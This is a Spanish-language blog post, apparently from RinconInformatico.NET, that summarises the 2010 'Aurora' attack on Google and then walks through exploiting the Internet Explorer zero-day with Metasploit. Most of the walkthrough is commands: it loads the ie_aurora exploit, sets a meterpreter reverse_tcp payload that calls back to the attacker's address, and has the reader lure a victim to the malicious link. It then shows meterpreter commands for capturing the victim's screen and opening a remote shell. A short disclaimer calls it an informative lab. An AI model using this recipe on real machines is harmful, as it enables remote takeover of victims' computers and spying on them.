Ciberataque Aurora: Explotando vulnerabilidad 0-day en Internet Explorer (PoC)

Hace pocos días,  Google y otras grandes empresas recibieron un ciberataque denominado “Aurora”  el cual aprovechaba una nueva vulnerabilidad de tipo 0-day en Internet explorer que permite  la ejecución remota de código en las maquinas vulnerables. Cito la noticia:

McAfee Labs ha estado trabajando contra reloj para evaluar cómo se realizó el ciberataque al que han bautizado como Aurora y que afectó tanto a Google como a varias decenas de empresas y a sus servidores de correo. Una de las causas de este ataque ha sido la aparición de una nueva vulnerabilidad Zero Day en Internet Explorer, que se descubrió recientemente gracias a esas tareas de investigación y sobre la que Microsoft ya ha publicado sus propias notas.

Según los estudios de McAfee, los intrusos ganaron accesos a las organizaciones mandando ataques a medida a ciertas personas que se supone que tienen permisos de acceso especiales. La combinación de mensajes que parecían provenir de fuentes de confianza y de la vulnerabilidad en IE puede haber sido la base de dichos ataques, según la firma de seguridad

Observando el impacto que tuvo dicha vulnerabilidad, acá en RinconInformatico.NET quisimos hacer una prueba de concepto (al igual como lo hicimos con una vulnerabilidad de Firefox) para comprobar lo fácil que es la explotacion de este fallo.

¿Que necesitamos?

  • Metasploit en su ultima versión ( o actualizarlo)
  • Una victima

Antes de empezar es oportuno aclarar que esta prueba fue hecha con un Windows XP SP2  e I6, según otras fuentes el exploit que se encuentra en el metasploit solo es efectivo con IE6, sin embargo, el exploit que pueden encontrar aqui sirve para todas las versiones de Internet explorer.

Y empezamos…

Después de tener nuestro metasploit framework abrimos la consola:

msfconsole

Ahora procedemos a seleccionar el exploit y darle los parámetros adecuados:

use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (nuestra ip)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

internet explorer exploit

Después de lanzar el exploit, debemos decirle a la víctima que acceda al siguiente enlace (LOCAL IP) en este caso es el siguiente:

http://192.168.1.4:8080/

Inmediatamente nuestra víctima abre el enlace malicioso veremos como  el metasploit empieza a trabajar, hasta que nos abre una sesión. El siguiente paso es seleccionar la sesión:

sessions -i 1 // donde 1 es el id de la sesión que se ha creado.

Si todo ha salido bien tendremos  el prompt de meterpreter, desde donde podemos hacer muchas cosas interesantes, como tomar un screenshot del escritorio de la víctima, saber el nombre del equipo con su grupo de trabajo,  o en su defecto tener un shell remota de nuestro equipo víctima. algunos ejemplos:

meterpreter > use espia
meterpreter > screenshot victima1.bmp // el screenshot quedara en tu escritorio


meterpreter> shell // obtendremos una shell donde podemos hacer lo que deseemos.

meterpreter shell

Consideraciones..

  • Con este método, solo es vulnerable ie6
  • Un antivirus actualizado detecta el ataque (comprobado con nod32 y mcafee)
  • Obviamente si la víctima cierra el internet explorer se caera el ataque.

Por ultimo, no sobra decir que este es un laboratorio informativo, es decir, un  prueba de concepto, el que haga esto no es un hacker. La idea de esta entrada no es ejecutar un exploit, es tratar de entender como es su funcionamiento y la forma de implementarlo.

2 Comments